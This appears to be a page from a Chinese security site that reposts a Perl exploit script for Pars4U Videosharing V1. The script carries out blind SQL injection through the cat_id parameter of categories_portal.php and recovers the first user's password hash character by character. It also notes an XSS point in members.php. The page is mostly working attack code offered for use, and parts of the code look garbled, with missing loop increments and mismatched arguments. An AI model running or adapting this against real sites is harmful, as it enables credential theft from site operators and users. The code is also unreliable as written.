Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

所属分类：网络安全 / Exploit 阅读数： 133

收藏 0赞 0分享

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################## VIVA ISLAME VIVA ISLAME ####################\n";
print " ################## VIVA ISLAME VIVA ISLAME ####################\n";
print " ## ##\n";
print " ## Pars4u Videosharing V1 Blind SQL Injection Exploit ##\n";
print " ## ##\n";
print " ## ( categories_portal.php cat_id ) ##\n";
print " ## http://pars4u.com/videosharing.html ##\n";
print " ## ##\n";
print " ## Author: Mr.SQL -(:: SYRIAN HACKERS ::)- ##\n";
print " ## EMAIL : SQL(at)HOTMAIL.IT ##\n";
print " ## HOME : WwW.PaL-HaCkEr.CoM ##\n";
print " ## ##\n";
print " ## -((:: !GrE3E3E3E3E3ETZz! ::))- ##\n";
print " ## ##\n";
print " ## - HaCkEr_EGy - His0k4 - Dark MaSTer - MoHaMaD AL 3rab - ##\n";
print " ## - Milw0rM - Ghost Hacker - ##\n";
print " ## ##\n";
print " ## <<>> MuSliMs HaCkErS <<>> ##\n";
print " ## ##\n";
print " ## Usage : perl exploit.pl host ##\n";
print " ## Example: perl exploit.pl www.host.com / -d 10 ##\n";
print " ## ##\n";
print " ## Options: ##\n";
print " ## -d valid cat_id value ##\n";
print " ###############################################################\n";
print " ###############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat_id = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$cat_id = $options{"u"};
}
if($options{"d"})
{
$cat_id = $options{"d"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cat_id, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat_id, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat_id = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."categories_portal.php?cat_id=".$cat_id." and (SUBSTRING((SELECT password FROM users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($cat_id{"p"})
{
$ua->proxy('http', "http://".$cat_id{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "1&cat_a"; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
} #######################
##
##-[[ XSS ]]-
## www.Target.com/members.php?PageNo= [[ XSS ]]
##
#######################

更多精彩内容其他人还在看

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

minb 0.1.0 Remote Code Execution Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

网络赚钱

站长故事